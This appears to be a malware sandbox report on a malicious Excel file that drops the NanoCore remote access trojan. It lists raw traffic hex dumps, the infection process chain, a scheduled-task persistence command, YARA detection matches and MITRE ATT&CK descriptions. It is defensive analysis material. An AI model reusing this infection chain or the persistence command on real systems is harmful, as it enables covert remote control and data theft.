f2 f2 67 57 76 1a f2 ea 85 Data Ascii: hv8~a`4_!5b&VL#9;EcRgI^0GY) iCmeuuljggm.jpgxVdD"E@T9/Yj8h#qzy5,LUN}C>~,Qb'IZUl=)^NuNY4~gWv
2021-10-13 07:59:22 UTC	1047	IN	Data Raw: 8b 24 f0 4a bc 05 76 00 a0 ca 29 dd f6 7a 72 f0 1f 98 5d 93 9e 6e 82 1a 22 a1 b6 10 37 0e 1b 36 56 41 f0 59 5c 8d 78 44 82 ee 42 f2 43 9f 43 c4 c9 26 14 5f 4a 8c 89 be 29 05 3c 70 20 7a 50 12 a6 fe ba 36 67 1b 67 27 25 3e fc 9b 5b e1 66 23 a2 8b 96 07 c2 e8 46 6d 14 8c 9d ae 10 40 f4 a2 fc d6 78 0a fd 0c 1c 4c 90 8a d2 0d 53 88 7e 61 c8 97 73 a7 c7 6d 54 fe 89 41 5c 80 2a ef 8a 2a 02 03 0b c2 03 04 a1 04 20 c6 4b 73 87 80 43 00 0e 73 72 73 6c 6d 62 6b 67 61 6d 2e 78 6d 6c 0a 03 02 68 9c 0d b0 d0 bf d7 01 cb 2e be 01 40 64 34 22 45 f4 50 65 ff f2 ab 9e 2f 93 3b 3f 8e 86 a9 a2 a2 2a 3b aa 7e c3 5e 8e 27 0e 84 47 a0 4f 7f ab 7c 84 aa 0c 32 4b fb eb f2 5b 92 a4 c9 97 33 2e 4f 21 c9 c5 f5 b2 22 4f 08 db 51 4f 11 b8 d0 66 21 51 2b 8b 3c 12 ed 62 7f 0c f2 f1 dc Data Ascii: $Jv)zr]n"76VAY\xDBCC&_J)<p zP6gg'%>[f#Fm@xLS~asmTA\** KsCsrslmbkgam.xmlh.@d4"EPe/;?*;~^'GO\|2K[3.O!"OQOf!Q+<b

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 1240 Parent PID: 596

General

Start time:	09:58:15
Start date:	13/10/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fa20000
File size:	28253536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: EQNEDT32.EXE PID: 2804 Parent PID: 596

General

Start time:	09:58:34
Start date:	13/10/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: vbc.exe PID: 2860 Parent PID: 2804

General

Start time:	09:58:37
Start date:	13/10/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x260000
File size:	1073384 bytes
MD5 hash:	B866823E1F8F4A52376BD108C457DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: mmuiqlcvwo.pif PID: 2516 Parent PID: 2860

General

Start time:	09:58:52
Start date:	13/10/2021
Path:	C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp
Imagebase:	0xfb0000
File size:	777456 bytes
MD5 hash:	8E699954F6B5D64683412CC560938507
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 27%, Virustotal, Browse Detection: 32%, ReversingLabs
Reputation:	low

Analysis Process: RegSvcs.exe PID: 2780 Parent PID: 2516

General

Start time:	09:58:58
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: schtasks.exe PID: 1724 Parent PID: 2780

General

Start time:	09:59:00
Start date:	13/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Imagebase:	0x510000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskeng.exe PID: 2936 Parent PID: 896

General

Start time:	09:59:01
Start date:	13/10/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xffdd0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: RegSvcs.exe PID: 632 Parent PID: 2936

General

Start time:	09:59:02
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: mmuiqlcvwo.pif PID: 2568 Parent PID: 1764

General

Start time:	09:59:07
Start date:	13/10/2021
Path:	C:\Users\user\33920049\mmuiqlcvwo.pif
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Imagebase:	0xfb0000
File size:	777456 bytes
MD5 hash:	8E699954F6B5D64683412CC560938507
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: RegSvcs.exe PID: 684 Parent PID: 2568

General

Start time:	09:59:12
Start date:	13/10/2021
Path:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Imagebase:	0xda0000
File size:	45216 bytes
MD5 hash:	62CE5EF995FD63A1847A196C2E8B267B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	moderate

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Import order764536.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

